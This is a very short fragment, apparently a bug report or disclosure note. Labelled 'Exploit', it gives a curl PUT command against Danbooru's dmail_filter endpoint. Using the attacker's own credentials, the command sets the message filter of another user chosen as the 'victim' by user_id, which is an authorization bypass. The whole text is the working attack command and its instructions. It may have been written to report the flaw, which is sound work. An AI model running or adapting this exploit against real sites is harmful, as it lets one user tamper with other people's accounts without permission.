a16b91e2bf
Exploit:
curl \
-u $USERNAME:$API_KEY \
-X PUT "http://danbooru.donmai.us/maintenance/user/dmail_filter.json?dmail_id=1" \
-d "dmail_filter[words]=owned&dmail_filter[user_id]=2"
...where dmail_id is any dmail you own (doesn't matter which) and user_id is the victim.